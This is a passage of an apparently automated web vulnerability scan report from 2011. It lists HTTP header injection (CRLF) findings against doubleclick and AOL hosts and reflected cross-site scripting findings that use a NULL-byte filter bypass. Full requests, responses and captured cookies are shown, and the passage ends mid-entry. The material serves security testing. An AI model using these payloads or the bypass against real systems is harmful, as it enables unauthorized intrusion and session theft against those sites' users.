/huffpost.politics/news;new-york=1;politics=1;;entry_id=840995;@depressing=1;@mostpopular=1;@recommend=1;@ypolitics=1;@yus-news=1;ferraro=1;ferraro-dead=1;ferraro-dies=1;ferraro-passes=1;geraldine-ferraro=1;geraldine-ferraro-cancer=1;geraldine-ferraro-dead=1;geraldine-ferraro-died:
Date: Sat, 26 Mar 2011 20:36:24 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.5. http://ad.doubleclick.net/adj/N6036.AOL/B5125476.4 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6036.AOL/B5125476.4

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 4d9cf%0d%0a87bb4119c15 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /4d9cf%0d%0a87bb4119c15/N6036.AOL/B5125476.4;sz=728x90;click=http%3A//at.atwola.com/adlink%2F5113%2F674622%2F0%2F225%2FAdId%3D1349284%3BBnId%3D3%3Bitime%3D171780247%3Bkvugc%3D0%3Bkvpg%3Dmusic.aol%2Fradioguide%2Fbb%3Bkvui%3Df2ed797a429811e090debf3ab4450fde%3Bkvmn%3D93232707%3Bkvtid%3D16lsqii1n1a3cr%3Bkr2703%3D73001%3Bkvseg%3D99999%3A61674%3A60489%3A60740%3A60490%3A56262%3A61576%3A60493%3A50963%3A60491%3A60515%3A60514%3A52614%3A53656%3A52842%3A56830%3A52615%3A60546%3A56918%3A60500%3A56920%3A56555%3A51133%3A56988%3A56917%3A53435%3A54173%3A56500%3A52611%3A54463%3A56969%3Bkp%3D-1%3Bnodecode%3Dyes%3Blink%3D;ord=171780247? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://music.aol.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/4d9cf
87bb4119c15
/N6036.AOL/B5125476.4;sz=728x90;click=http: //at.atwola.com/adlink/5113/674622/0/225/AdId=1349284;BnId=3;itime=171780247;kvugc=0;kvpg=music.aol/radioguide/bb;kvui=f2ed797a429811e090debf3ab4450fde;kvmn=93232707;kvtid=16lsqii1n1a3cr;kr2703=73001;kvseg=99999:61674:60489:60740:60490:56
Date: Sat, 26 Mar 2011 20:36:50 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.6. http://ad.doubleclick.net/adj/huffpost.politics/longpost [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/huffpost.politics/longpost

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 47115%0d%0af411b5489be was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /47115%0d%0af411b5489be/huffpost.politics/longpost;new-york=1;politics=1;;entry_id=840995;@depressing=1;@mostpopular=1;@recommend=1;@ypolitics=1;@yus-news=1;ferraro=1;ferraro-dead=1;ferraro-dies=1;ferraro-passes=1;geraldine-ferraro=1;geraldine-ferraro-cancer=1;geraldine-ferraro-dead=1;geraldine-ferraro-died=1;geraldine-ferraro-dies=1;geraldine-ferraro-passes=1;gerry-ferraro-dead=1;gerry-ferraro-dies=1;gerry-ferraro-passes=1;global=1;cap_12=n;qcs=D;qcs=T;qcs=2687;qcs=2685;qcs=2402;qcs=1910;qcs=1908;qcs=1905;qcs=1592;qcs=683;qcs=682;qcs=680;qcs=679;qcs=678;qcs=677;qcs=676;qcs=666;qcs=665;qcs=660;qcs=657;;plat=win;br=ch;bv=10;subbv=0;load_mode=inline;page_type=bpage;pos=mid_article;hot=fb;hot=tw;u=300x250%7Cbpage%7Cmid_article%7C@depressing,@mostpopular,@recommend,@ypolitics,@yus-news,ferraro,ferraro-dead,ferraro-dies,ferraro-passes,geraldine-ferraro,geraldine-ferraro-cancer,geraldine-ferraro-dead,geraldine-ferraro-died,geraldine-ferraro-dies,geraldine-ferraro-passes,gerry-ferraro-dead,gerry-ferraro-dies,gerry-ferraro-passes%7Cfb,tw%7C%7CD,T,2687,2685,2402,1910,1908,1905,1592,683,682,680,679,678,677,676,666,665,660,657%7C840995%7C%7C%7C;sz=300x250;tile=3;ord=20736431? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/ads/ads_iframe.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/47115
f411b5489be
/huffpost.politics/longpost;new-york=1;politics=1;;entry_id=840995;@depressing=1;@mostpopular=1;@recommend=1;@ypolitics=1;@yus-news=1;ferraro=1;ferraro-dead=1;ferraro-dies=1;ferraro-passes=1;geraldine-ferraro=1;geraldine-ferraro-cancer=1;geraldine-ferraro-dead=1;geraldine-ferraro-:
Date: Sat, 26 Mar 2011 20:36:38 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.7. http://ad.doubleclick.net/adj/huffpost.politics/news [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/huffpost.politics/news

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 234dc%0d%0a00fe8347eca was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /234dc%0d%0a00fe8347eca/huffpost.politics/news;new-york=1;politics=1;;entry_id=840995;@depressing=1;@mostpopular=1;@recommend=1;@ypolitics=1;@yus-news=1;ferraro=1;ferraro-dead=1;ferraro-dies=1;ferraro-passes=1;geraldine-ferraro=1;geraldine-ferraro-cancer=1;geraldine-ferraro-dead=1;geraldine-ferraro-died=1;geraldine-ferraro-dies=1;geraldine-ferraro-passes=1;gerry-ferraro-dead=1;gerry-ferraro-dies=1;gerry-ferraro-passes=1;global=1;cap_12=n;qcs=D;qcs=T;qcs=2687;qcs=2685;qcs=2402;qcs=1910;qcs=1908;qcs=1905;qcs=1592;qcs=683;qcs=682;qcs=680;qcs=679;qcs=678;qcs=677;qcs=676;qcs=666;qcs=665;qcs=660;qcs=657;;plat=win;br=ch;bv=10;subbv=0;load_mode=inline;page_type=bpage;pos=right_rail_flex;hot=fb;hot=tw;u=300x250,300x600%7Cbpage%7Cright_rail_flex%7C@depressing,@mostpopular,@recommend,@ypolitics,@yus-news,ferraro,ferraro-dead,ferraro-dies,ferraro-passes,geraldine-ferraro,geraldine-ferraro-cancer,geraldine-ferraro-dead,geraldine-ferraro-died,geraldine-ferraro-dies,geraldine-ferraro-passes,gerry-ferraro-dead,gerry-ferraro-dies,gerry-ferraro-passes%7Cfb,tw%7C%7CD,T,2687,2685,2402,1910,1908,1905,1592,683,682,680,679,678,677,676,666,665,660,657%7C840995%7C%7C%7C;sz=300x250,300x600;tile=5;ord=20736431? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/234dc
00fe8347eca
/huffpost.politics/news;new-york=1;politics=1;;entry_id=840995;@depressing=1;@mostpopular=1;@recommend=1;@ypolitics=1;@yus-news=1;ferraro=1;ferraro-dead=1;ferraro-dies=1;ferraro-passes=1;geraldine-ferraro=1;geraldine-ferraro-cancer=1;geraldine-ferraro-dead=1;geraldine-ferraro-died:
Date: Sat, 26 Mar 2011 20:36:43 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.8. http://my.screenname.aol.com/_cqr/login/login.psp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.screenname.aol.com
Path:   /_cqr/login/login.psp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload f0b8d%0d%0aafccb6f9a was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /_cqr/login/login.psp?sitedomain=sns.webmail.aol.com&lang=en&locale=us&authLev=0&siteState=ver%3a4%7crt%3aSTANDARD%7cat%3aSNS%7cld%3amail.aol.com%7cuv%3aAOL%7clc%3aen-us%7cmt%3aANGELIA%7csnt%3aScreenName%7csid%3a187531a0-71f6-4ddd-8234-25df9b0c705b&offerId=newmail-en-us-v2&seamless=novl&f0b8d%0d%0aafccb6f9a=1 HTTP/1.1
Host: my.screenname.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B17114051D1312-60000137800000AA[CE]; SNS_LDC=1&-&-&1299520397&1&1299520397&0; VWCUKP300=L123100/Q68122_12959_135_032411_3_032511_421359x420922x032411x3x3/Q68068_12959_135_032311_3_032511_422204x420765x032411x2x2_421239x420302x032411x1x1; s_pers=%20s_getnr%3D1301171798825-Repeat%7C1364243798825%3B%20s_nrgvo%3DRepeat%7C1364243798828%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.1247

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 26 Mar 2011 20:37:23 GMT
Pragma: No-cache
Cache-Control: no-cache,no-store,max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: https://my.screenname.aol.com/_cqr/login/login.psp?f0b8d
afccb6f9a
=1&seamless=novl&locale=us&offerId=newmail-en-us-v2&siteState=ver%3A4%7Crt%3ASTANDARD%7Cat%3ASNS%7Cld%3Amail.aol.com%7Cuv%3AAOL%7Clc%3Aen-us%7Cmt%3AANGELIA%7Csnt%3AScreenName%7Csid%3A187531a0-71f6-4ddd-8234-25df9b0c705b&authLev=0&sitedomain=sns.webmail.aol.com&lang=en
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 0
P3P: CP="PHY ONL PRE STA CURi OUR IND"


4.9. http://tacoda.at.atwola.com/rtx/r.js [N cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The value of the N cookie is copied into the Set-Cookie response header. The payload 66e42%0d%0aa76191a841c was submitted in the N cookie. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=MUS&si=16768&pi=L&xs=3&pu=http%253A//cdn.at.atwola.com/_media/uac/tcode3.html%253Fifu%253Dhttp%25253A//music.aol.com/radioguide/bb%2526cmmiss%253D-1%2526cmkw%253D&r=&df=1&v=5.5&cb=94859 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://cdn.at.atwola.com/_media/uac/tcode3.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D69B03E6E651A440C6EAF39F001EBEA; ATTACID=a3Z0aWQ9MTZsc3FpaTFuMWEzY3I=; ANRTT=61225^1^1301330893|60183^1^1301587729|50216^1^1301436289|61166^1^1301592818; TData=99999|^|61674|60489|60740|60490|56262|61576|60493|50963|60491|60515|60514|52614|53656|52842|56830|52615|60546|56918|60500|56920|56555|51133|56988|56917|53435|54173|56500|52611|54463|56969|56835|54938|61166|56761|56780; N=2:ef750afea1932931347519ba153fff1c,a07761c4014e52e7e1bc39b6a051a86866e42%0d%0aa76191a841c; ATTAC=a3ZzZWc9OTk5OTk6NjE2NzQ6NjA0ODk6NjA3NDA6NjA0OTA6NTYyNjI6NjE1NzY6NjA0OTM6NTA5NjM6NjA0OTE6NjA1MTU6NjA1MTQ6NTI2MTQ6NTM2NTY6NTI4NDI6NTY4MzA6NTI2MTU6NjA1NDY6NTY5MTg6NjA1MDA6NTY5MjA6NTY1NTU6NTExMzM6NTY5ODg6NTY5MTc6NTM0MzU6NTQxNzM6NTY1MDA6NTI2MTE6NTQ0NjM6NTY5Njk=; eadx=2

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:37:16 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Sat, 26 Mar 2011 20:52:16 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZsc3FpaTFuMWEzY3I=; path=/; expires=Tue, 20-Mar-12 20:37:16 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=61225^1^1301330893|60183^1^1301587729|50216^1^1301436289|61166^1^1301592818|50215^1^1301776636; path=/; expires=Sat, 02-Apr-11 20:37:16 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1301171786^1301173636|16768^1301171786^1301173636; path=/; expires=Sat, 26-Mar-11 21:07:16 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|60739|60489|60740|60490|56262|56511|60493|50963|60491|60515|60514|52614|53656|52842|56830|55401|52615|60546|56918|60500|56920|56555|56761|56500|56988|52611|53603|54173|53435|54463|56917|56969|56718|56835|56715; expires=Tue, 20-Mar-12 20:37:16 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:a07761c4014e52e7e1bc39b6a051a86866e42
a76191a841c
,7a83820d0a0dd8c854eabe6c04f3aee3; expires=Tue, 20-Mar-12 20:37:16 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NjA3Mzk6NjA0ODk6NjA3NDA6NjA0OTA6NTYyNjI6NTY1MTE6NjA0OTM6NTA5NjM6NjA0OTE6NjA1MTU6NjA1MTQ6NTI2MTQ6NTM2NTY6NTI4NDI6NTY4MzA6NTU0MDE6NTI2MTU6NjA1NDY6NTY5MTg6NjA1MDA6NTY5MjA6NTY1NTU6NTY3NjE6NTY1MDA6NTY5ODg6NTI2MTE6NTM2MDM6NTQxNzM6NTM0MzU6NTQ0NjM=; expires=Tue, 20-Mar-12 20:37:16 GMT; path=/; domain=.at.atwola.com
Set-Cookie: eadx=x; path=/; expires=Tue, 29-Mar-11 20:37:16 GMT; domain=tacoda.at.atwola.com
ntCoent-Length: 321
Content-Type: application/x-javascript
Content-Length: 321

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16lsqii1n1a3cr';
var ANSL='99999|^|60739|60489|60740|60490|56262|56511|60493|50963|60491|60515|60514|52614|53656|52842|56830|55401|52615|60546|56918|
...[SNIP]...

4.10. http://tacoda.at.atwola.com/rtx/r.js [si parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The value of the si request parameter is copied into the Set-Cookie response header. The payload 29cb8%0d%0ab6126af3077 was submitted in the si parameter. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=MUS&si=29cb8%0d%0ab6126af3077&pi=L&xs=3&pu=http%253A//cdn.at.atwola.com/_media/uac/tcode3.html%253Fifu%253Dhttp%25253A//music.aol.com/radioguide/bb%2526cmmiss%253D-1%2526cmkw%253D&r=&df=1&v=5.5&cb=94859 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://cdn.at.atwola.com/_media/uac/tcode3.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4D69B03E6E651A440C6EAF39F001EBEA; ATTACID=a3Z0aWQ9MTZsc3FpaTFuMWEzY3I=; ANRTT=61225^1^1301330893|60183^1^1301587729|50216^1^1301436289|61166^1^1301592818; TData=99999|^|61674|60489|60740|60490|56262|61576|60493|50963|60491|60515|60514|52614|53656|52842|56830|52615|60546|56918|60500|56920|56555|51133|56988|56917|53435|54173|56500|52611|54463|56969|56835|54938|61166|56761|56780; N=2:ef750afea1932931347519ba153fff1c,a07761c4014e52e7e1bc39b6a051a868; ATTAC=a3ZzZWc9OTk5OTk6NjE2NzQ6NjA0ODk6NjA3NDA6NjA0OTA6NTYyNjI6NjE1NzY6NjA0OTM6NTA5NjM6NjA0OTE6NjA1MTU6NjA1MTQ6NTI2MTQ6NTM2NTY6NTI4NDI6NTY4MzA6NTI2MTU6NjA1NDY6NTY5MTg6NjA1MDA6NTY5MjA6NTY1NTU6NTExMzM6NTY5ODg6NTY5MTc6NTM0MzU6NTQxNzM6NTY1MDA6NTI2MTE6NTQ0NjM6NTY5Njk=; eadx=2

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:37:15 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Sat, 26 Mar 2011 20:52:15 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZsc3FpaTFuMWEzY3I=; path=/; expires=Tue, 20-Mar-12 20:37:15 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=61225^1^1301330893|60183^1^1301587729|50216^1^1301436289|61166^1^1301592818|50215^1^1301776635; path=/; expires=Sat, 02-Apr-11 20:37:15 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1301171786^1301173635|16768^1301171786^1301173586|29cb8
b6126af3077
^1301171835^1301173635; path=/; expires=Sat, 26-Mar-11 21:07:15 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|60739|60489|60740|60490|56262|56511|60493|50963|60491|60515|60514|52614|53656|52842|56830|55401|52615|60546|56918|60500|56920|56555|56761|56500|56988|52611|53603|54173|53435|54463|56917|56969|56718|56835|56715; expires=Tue, 20-Mar-12 20:37:15 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:0cd73208ac57a723a07d874a21de8895,7a83820d0a0dd8c854eabe6c04f3aee3; expires=Tue, 20-Mar-12 20:37:15 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NjA3Mzk6NjA0ODk6NjA3NDA6NjA0OTA6NTYyNjI6NTY1MTE6NjA0OTM6NTA5NjM6NjA0OTE6NjA1MTU6NjA1MTQ6NTI2MTQ6NTM2NTY6NTI4NDI6NTY4MzA6NTU0MDE6NTI2MTU6NjA1NDY6NTY5MTg6NjA1MDA6NTY5MjA6NTY1NTU6NTY3NjE6NTY1MDA6NTY5ODg6NTI2MTE6NTM2MDM6NTQxNzM6NTM0MzU6NTQ0NjM=; expires=Tue, 20-Mar-12 20:37:15 GMT; path=/; domain=.at.atwola.com
Set-Cookie: eadx=x; path=/; expires=Tue, 29-Mar-11 20:37:15 GMT; domain=tacoda.at.atwola.com
Cteonnt-Length: 321
Content-Type: application/x-javascript
Content-Length: 321

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16lsqii1n1a3cr';
var ANSL='99999|^|60739|60489|60740|60490|56262|56511|60493|50963|60491|60515|60514|52614|53656|52842|56830|55401|52615|60546|56918|
...[SNIP]...

5. Cross-site scripting (reflected)  previous  next
There are 149 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


5.1. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [adurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2524.134426.0710433834321/B4169763.45

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %005f8f3"-alert(1)-"b8b286ead4a was submitted in the adurl parameter. This input was echoed as 5f8f3"-alert(1)-"b8b286ead4a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B_3W2gOaNTb_MJcfPlQfPk9SfDJWpie8BhaKK8hLjqLazM4DergIQARgBIL7O5Q04AFDEwrTWBmDJBqABo67u9gOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAS5odHRwOi8veHNzLmN4L2V4YW1wbGVzL2FjdW5ldGl4LzFhbmQxLWFjdS5odG1suAIYwAIFyALl78UYqAMB0QNftM276KVd5OgDaOgDrgL1AwAAAMQ&num=1&sig=AGiWqtzQTOPrKOw5jbAV3R0-O_Vx0ho4QA&client=ca-pub-4063878933780912&adurl=%005f8f3"-alert(1)-"b8b286ead4a HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301163258&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2Fexamples%2Facunetix%2F1and1-acu.html&dt=1301145263878&bpp=3&shv=r20110315&jsv=r20110321-2&correlator=1301145263926&frm=0&adk=1819763764&ga_vid=1614914829.1301145264&ga_sid=1301145264&ga_hid=614052216&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1167&bih=1049&fu=0&ifi=1&dtd=170&xpc=aCf5lBJVxh&p=http%3A//xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6985
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 26 Mar 2011 13:14:51 GMT
Expires: Sat, 26 Mar 2011 13:14:51 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
AS5odHRwOi8veHNzLmN4L2V4YW1wbGVzL2FjdW5ldGl4LzFhbmQxLWFjdS5odG1suAIYwAIFyALl78UYqAMB0QNftM276KVd5OgDaOgDrgL1AwAAAMQ&num=1&sig=AGiWqtzQTOPrKOw5jbAV3R0-O_Vx0ho4QA&client=ca-pub-4063878933780912&adurl=%005f8f3"-alert(1)-"b8b286ead4ahttp://ads.networksolutions.com/landing?code=P111C519S512N0B2A1D691E0000V101");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "nev
...[SNIP]...

5.2. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [ai parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2524.134426.0710433834321/B4169763.45

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00962c0"-alert(1)-"a036383781d was submitted in the ai parameter. This input was echoed as 962c0"-alert(1)-"a036383781d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

